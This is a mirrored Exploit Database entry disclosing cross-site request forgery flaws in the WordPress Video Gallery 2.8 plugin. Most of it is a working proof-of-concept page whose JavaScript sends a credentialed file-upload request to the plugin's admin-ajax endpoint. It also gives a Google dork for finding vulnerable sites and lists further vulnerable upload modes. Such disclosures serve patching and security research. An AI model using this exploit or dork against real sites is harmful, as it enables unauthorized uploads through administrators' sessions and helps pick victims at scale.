WordPress Plugin Video Gallery 2.8 – Multiple Cross-Site Request Forgery Vulnerabilities

• Exploit Database
• 101 阅读

• 作者： Divya
  日期： 2015-04-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/36610/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62

  # Exploit Title: WordPress Video Gallery Plugin Multiple CSRF File Upload # Google Dork: inurl:/wp-content/plugins/contus-video-gallery # Date: 31 March 2015 # Exploit Author: Divya # Vendor Homepage: https://wordpress.org/plugins/contus-video-gallery/ # Software Link: https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip # Version: 2.8 # Tested on: Windows, Linux # CVE : None   CSRF File Upload Exploit Code:   <html> <head> <title> WP Plugin CSRF File Upload </title> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://192.168.1.2/wp-admin/admin-ajax.php?action=uploadvideo", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------103932797413649"); xhr.withCredentials = true; var body = "-----------------------------103932797413649\r\n" + "Content-Disposition: form-data; name=\"myfile\"; filename=\"test.mp4\"\r\n" + "Content-Type: video/mp4\r\n" + "\r\n" + "hello world how are you\r\n" + "-----------------------------103932797413649\r\n" + "Content-Disposition: form-data; name=\"mode\"\r\n" + "\r\n" + "video\r\n" + "-----------------------------103932797413649--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit" onclick="submitRequest();" /> </form>   </body> </html>     Other CSRF vulnerable areas of application: URL: http://192.168.1.2/wp-admin/admin-ajax.php?action=uploadvideo Data: myfile=[upload_file_details]&mode=video   URL: http://192.168.1.2/wp-admin/admin-ajax.php?action=uploadvideo Data: myfile=[upload_file_details]&mode=image   URL: http://192.168.1.2/wp-admin/admin-ajax.php?action=uploadvideo Data: myfile=[upload_file_details]&mode=srt